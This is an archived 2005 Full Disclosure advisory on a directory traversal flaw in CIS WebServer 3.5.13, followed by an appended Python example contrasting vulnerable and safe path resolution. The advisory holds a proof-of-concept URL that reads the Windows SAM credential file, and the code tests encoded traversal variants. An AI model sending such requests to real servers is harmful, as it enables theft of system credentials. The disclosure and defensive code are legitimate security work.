Full Disclosure mailing list archives
CIS WebServer Directory Traversal Bug
From: "CorryL" <corryl () sitoverde com>
Date: Fri, 25 Feb 2005 18:33:54 +0100
-=[ x0n3-h4ck Italian Security Team ]=-

/*Advisories*\

/*
Application: CIS WebServer
Vendor's Url: www.cisindia.net
Version: 3.5.13
Platforms: Windows
Bug: Directory Traversal
Exploitation: Remote
Author: CorryL corryl80 () gmail com
www.x0n3-h4ck.org
*\

{Description}
CIS WebServer is an easy http server. A remote user can obtain files on the system that are located outside of the web document directory.

{Bug}
http://victimhost/../../../windows/repair/sam
A remote user succeeds in reading the file sam of the system where CIS WebServer is running.

{Vendor Status}
20/02/2005 Vendor notification
21/02/2005 Vendor Response
25/02/2005 No patch release from vendor
25/02/2005 Public disclosure

{Fix}
Waiting for an official patch

CorryL
corryl80 () gmail com
www.x0n3-h4ck.org
Italian Security Team
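The missing check this class of bug comes down to, as an added example that is not part of the advisory and not CIS WebServer code: a static file handler has to confine the decoded request path to the document root before opening anything. The function names and sample requests below are constructed for illustration.

```python
import os
from urllib.parse import unquote, urlsplit


def naive_resolve(doc_root, target):
    """Vulnerable pattern: the request path is joined to the root unchecked."""
    return os.path.normpath(os.path.join(doc_root, target.lstrip("/")))


def safe_resolve(doc_root, target):
    """Return a path inside doc_root, or None if the request must be refused."""
    path = unquote(urlsplit(target).path)   # decode %2e%2e, %5c ... exactly once
    path = path.replace("\\", "/")          # Windows accepts both separators
    if "\x00" in path:
        return None
    segments = [s for s in path.split("/") if s not in ("", ".")]
    if any(s == ".." or ":" in s for s in segments):
        return None                          # dot-dot, drive letter or stream syntax
    root = os.path.realpath(doc_root)
    candidate = os.path.realpath(os.path.join(root, *segments))
    # Containment check on the resolved path also catches links leaving the root.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    root = os.path.abspath("wwwroot")        # hypothetical document root
    # Constructed sample requests; the first is the path from the advisory.
    for req in ("/../../../windows/repair/sam",
                "/..%5c..%5cwindows%5crepair%5csam",
                "/docs/./index.html"):
        print(req, "->", naive_resolve(root, req), "|", safe_resolve(root, req))
```
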